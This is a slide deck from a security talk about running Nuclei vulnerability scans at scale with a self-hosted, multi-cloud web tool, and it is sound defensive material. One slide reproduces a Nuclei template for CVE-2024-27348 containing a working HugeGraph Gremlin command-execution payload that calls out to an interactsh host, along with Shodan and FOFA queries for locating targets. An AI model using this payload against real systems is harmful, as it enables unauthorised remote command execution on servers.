going to
Run Nuclei Scans at Scale Without Nuclei Cloud
Slides URL
Agenda
Run Nuclei Scans at Scale Without Nuclei Cloud
1
2
3
4
5
5
Introduction
Black Hills Information Security
Run Nuclei Scans at Scale Without Nuclei Cloud
What is the antisoc
Run Nuclei Scans at Scale Without Nuclei Cloud
YouR Friendly Neighborhood APT
What if we could red team your company all year. How would that affect your security?
Run Nuclei Scans at Scale Without Nuclei Cloud
YouR Friendly Neighborhood APT
- Initial Access
- Assumed Compromise
- Post Exploitation
- Purple Team
- Scanning
Run Nuclei Scans at Scale Without Nuclei Cloud
Scanning
- Vulnerability Scanning
- Data Breach Analysis
- Attack Surface Management (ASM) Light
Run Nuclei Scans at Scale Without Nuclei Cloud
Vulnerability Scanning (options)
- Nessus
- Nuclei
-
Qualys
- Many more..
Run Nuclei Scans at Scale Without Nuclei Cloud
Vulnerability Scanning (First)
- Enumerate the attack surface
- Domains
- IP
- Services
- Ports
Run Nuclei Scans at Scale Without Nuclei Cloud
Vulnerability Scanning (NeedS)
- Constant Scans
- Actionable Data/Findings
- Scalable/Multiple customers
-
History
-
Control
Run Nuclei Scans at Scale Without Nuclei Cloud
build or buy
- Do the current options meet your needs.
- Cost is a factor
- Value for the customer
- Value for the team
- Customization
Run Nuclei Scans at Scale Without Nuclei Cloud
nuclei
if you take nothing from this presentation go run nuclei
Run Nuclei Scans at Scale Without Nuclei Cloud
what is it
- High performance vulnerability scanner
- Simple YAML vulnerability templates
- Supports multiple protocols like TCP, DNS, HTTP, SSL, WHOIS JavaScript
- Ultra-fast parallel scan processing and request clustering.
Run Nuclei Scans at Scale Without Nuclei Cloud
CLI
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.3.8
projectdiscovery.io
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /Users/ralph/nuclei-templates
[INF] Current nuclei version: v3.3.8 (latest)
[INF] Current nuclei-templates version: v10.1.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 154
[INF] Templates loaded for current scan: 7607
[INF] Executing 7425 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 182 unsigned templates for scan. Use with caution.
[INF] No results found. Better luck next time!Run Nuclei Scans at Scale Without Nuclei Cloud
template
id: CVE-2024-27348
info:
name: Apache HugeGraph-Server - Remote Command Execution
author: DhiyaneshDK
severity: high
description: |
Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
reference:
- http://www.openwall.com/lists/oss-security/2024/04/22/3
- https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
- https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
- https://github.com/Zeyad-Azima/CVE-2024-27348
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
- https://nvd.nist.gov/vuln/detail/CVE-2024-27348
classification:
cve-id: CVE-2024-27348
cwe-id: CWE-77
epss-score: 0.00045
epss-percentile: 0.15047
metadata:
verified: true
max-request: 1
shodan-query: title:"HugeGraph"
fofa-query: title="HugeGraph"
tags: cve,cve2024,hugegraph,rce,apache
http:
- raw:
- |
POST /gremlin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(header, "application/json")'
- 'contains(body, "inputStream\":")'
condition: and
# digest: 4a0a004730450221008578493cfb808436d459d2ccb291e869a96890bc1073b44ba502680294d2a06602200ba6baa9516109d23319e018aee1d92b35ea91dc9b6c1c1c1a8ffe673f471f3f:922c64590222798bb761d5b6d8e72950Run Nuclei Scans at Scale Without Nuclei Cloud
why did we choose it
- Results (High findings that were exploitable)
- Cost
- Speed
- Customizability
Run Nuclei Scans at Scale Without Nuclei Cloud
The problem
Run Nuclei Scans at Scale Without Nuclei Cloud
NUCLEI Scanning at scale
- One Consultant == Several Clients
- Control Cost
- Highly Customizable
- Expanded IP Space
Run Nuclei Scans at Scale Without Nuclei Cloud
First attempt CI/CD
- Use Ansible / Terraform
- Use with CI/CD to call scans
- Save Output to a S3 Bucket
- Highly Scaliable / One VM per scan
- Integrate with Jira for Deploying and Results
Run Nuclei Scans at Scale Without Nuclei Cloud
CI/CD Problems
- All code no interface
- No history
- State of Saved Findings
- Lacked a database
- No way to search though findings
- Better then manual scans but no data metrics
Run Nuclei Scans at Scale Without Nuclei Cloud
Next steps
- Build a web application
- Simple User Interface
- Allow for group think
- Scan at scale with no code experience
- Search though data visually
Run Nuclei Scans at Scale Without Nuclei Cloud
what about project desicovery cloud
- High cost (Pass to Customer)
- Black box (what ip address did we use)
- Customer data
- We tested it. It worked but some times it would just fail.
Run Nuclei Scans at Scale Without Nuclei Cloud
Run Nuclei Scans at Scale Without Nuclei Cloud
what is it
- Nuclei Scanning at scale
- Self Hosted
- Muti-User
- Muti-Cloud
- Simple Web Interface
Run Nuclei Scans at Scale Without Nuclei Cloud
diagram
S3 Bucket
Scan1
Scan2
SSH/API
Run Nuclei Scans at Scale Without Nuclei Cloud
tech stack
- Golang Pocketbase
- SQL Light DB
- Svelte Frontend
- Ansible
- Terraform
Run Nuclei Scans at Scale Without Nuclei Cloud
demo
May the Demo Gods Bless me
Run Nuclei Scans at Scale Without Nuclei Cloud
Release
- Open Source
- Cost $ Free
- Active Development
- Using it at ANTISOC
- Beautiful Docs
Run Nuclei Scans at Scale Without Nuclei Cloud
future
- Scan Chunking / Spilit up the scope
- More Cloud Providers
- Better Data Insights
- Scope Enumeration
- LLM Integration
- You can be part of this (Yes you)
Run Nuclei Scans at Scale Without Nuclei Cloud
Conclusion
Run Nuclei Scans at Scale Without Nuclei Cloud
Recap
- Scanning at scale is hard
- Nuclei is highly customizable
- Sometimes you need to build it
- Collaboration is key and data is power
Run Nuclei Scans at Scale Without Nuclei Cloud
questions
Run Nuclei Scans at Scale Without Nuclei Cloud